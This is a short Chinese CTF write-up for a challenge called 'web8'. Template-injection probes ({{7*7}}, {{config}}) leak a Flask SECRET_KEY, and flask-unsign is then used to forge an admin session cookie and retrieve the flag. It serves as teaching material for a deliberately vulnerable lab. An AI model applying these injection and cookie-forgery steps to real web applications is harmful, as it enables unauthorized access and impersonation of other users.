web8-考核

打开网页提示“Only the admin can get the flag,flag in /flag”“you name is None"

访问http://xmctf.top:8861/?name={{7}},返回"you name is 7"

访问http://xmctf.top:8861/?name={{7*7}},返回"you name is 49"

猜测可能为模板注入

访问http://xmctf.top:8861/?name={{config}},得到了"'SECRET_KEY': 'woshicaiji'"

访问http://xmctf.top:8861/flag,提示refuse

尝试将自己身份更改为admin

获取session,为"eyJ1c2VybmFtZSI6eyIgYiI6IlozVmxjM1E9In19.X9DgZg.AGJnfzJNE5BQk13dFTD_FTAzBFE"

用flask-unsign解码,密钥为"woshicaiji",得到"{'username': b'guest'}"

用flask-unsign编码,明文为"{'username': b'admin'}",密钥为"woshicaiji",得到"eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.X9DkMQ.UjeS5ZjXn2-5flGTVfB3MCrLg8Y"

更改session重新访问,得到flag:

xmctf{f8e74d4b1b3fcd479f9b2a6a9ef935e0}

posted @ 2020-12-09 22:57  hktk1643  阅读(165)  评论(0编辑  收藏  举报